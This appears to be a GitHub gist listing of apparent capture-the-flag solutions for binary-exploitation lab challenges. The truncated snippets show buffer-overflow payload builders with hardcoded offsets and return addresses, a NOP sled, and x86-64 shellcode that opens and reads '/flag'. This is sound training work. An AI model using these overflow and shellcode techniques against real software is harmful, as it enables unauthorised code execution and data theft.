Kevin Mora morkev
morkev
/ nop_sleds.asm
Last active
May 1, 2025 19:40
Write and execute shellcode to read the flag. A portion of the input is randomly skipped.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BITS 64 | |
| section .text | |
| global _start | |
| _start: | |
| nop_sled: | |
| times 0x800 nop | |
| shellcode_start: |
morkev
/ binary_exploitation_tricky_control_hijack_hard.py
Created
November 24, 2024 08:32
Binary Exploitation Tricky Control Hijack Hard
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########################################################################## | |
| # 1. Unlike the easy version, it does not give you helpful debug output. | |
| # You will have to recover this information using a debugger. | |
| # 2. The source code is not provided. | |
| # You will need to reverse-engineer the binary, but remember, | |
| # the challenge is conceptually the same as the easy version, | |
| # so it can be helpful to have the easy version's source code | |
| # as a secondary reference during your reversing process! | |
| # 2. Some randomization is different. | |
| # Buffers might have different lengths, offsets might vary, etc. |
morkev
/ binary_exploitation_tricky_control_hijack.py
Created
November 24, 2024 08:18
Binary Exploitation Tricky Control Hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| import sys | |
| offset_to_return = 152 # Calculated offset | |
| win_authed_addr = 0x4017b8 # From GDB disassembly | |
| payload = b"A" * offset_to_return | |
| payload += struct.pack("<Q", win_authed_addr) | |
| with open("payload.bin", "wb") as f: |
morkev
/ binary_exploitation_control_hijack_hard.py
Created
November 24, 2024 08:06
Binary Exploitation Control Hijack Hard
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################## | |
| # HOW TO RUN THIS PUPPY: | |
| # python3 poo.py > /dev/null | |
| # wc -c payload.bin | |
| # python3 poo.py | /challenge/binary-exploitation-control-hijack | |
| ################################################################## | |
| import struct | |
| import sys | |
| offset_to_return = 104 # Calculated offset |
morkev
/ binary_exploitation_precision_hard.py
Created
November 24, 2024 07:52
Binary Exploitation Precision Hard
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| buffer_size = 123 | |
| offset_to_win = 123 | |
| offset_to_lose = 127 | |
| padding = offset_to_win | |
| win_value = struct.pack("<I", 1) |
morkev
/ binary_exploitation_variable_control_hard.py
Created
November 24, 2024 07:50
Binary Exploitation Variable Control Hard
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ####################################################################### | |
| # HOW TO RUN: | |
| # python3 binary_exploitation_variable_control_hard.py > /dev/null | |
| # wc -c payload.bin | |
| # /challenge/binary-exploitation-var-control < payload.bin | |
| ####################################################################### | |
| import sys | |
| import struct | |
| padding = 56 |
morkev
/ binary_exploitation_shellcode.asm
Created
November 23, 2024 00:11
Assembly Binary Exploitation Shellcode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [BITS 64] | |
| section .text | |
| global _start | |
| _start: | |
| ; Push '/flag\x00' onto the stack | |
| xor rax, rax | |
| mov rbx, 0x0067616c662f ; '/flag\x00' in little-endian | |
| push rbx |
morkev
/ binary_exploitation_shellcode_execution.py
Created
November 23, 2024 00:10
Binary Exploitation Basic Shellcode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| import sys | |
| def main(): | |
| try: | |
| with open('shellcode.bin', 'rb') as f: | |
| shellcode = f.read() | |
| except FileNotFoundError: | |
| print("Error: 'shellcode.bin' not found. Make sure you have assembled 'shellcode.asm' using NASM.") | |
| sys.exit(1) |
morkev
/ binary_exploitation_hijack_to_mmap_shellcode.py
Last active
February 18, 2025 09:01
Hijacking control flow to a memory-mapped shellcode that you input separately.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # Modified shellcode to use absolute path to flag | |
| shellcode = asm(''' | |
| /* Open flag file */ | |
| mov rax, 2 /* SYS_open */ | |
| lea rdi, [rip+flag] /* filename */ | |
| xor rsi, rsi /* O_RDONLY */ | |
| syscall | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| import subprocess | |
| def read_header(f): | |
| """Read and parse the cIMG header""" | |
| magic = f.read(4) | |
| if magic != b"cIMG": | |
| raise ValueError("Invalid magic number") | |
| version, width, height, num_directives = struct.unpack("<HBBI", f.read(8)) |
NewerOlder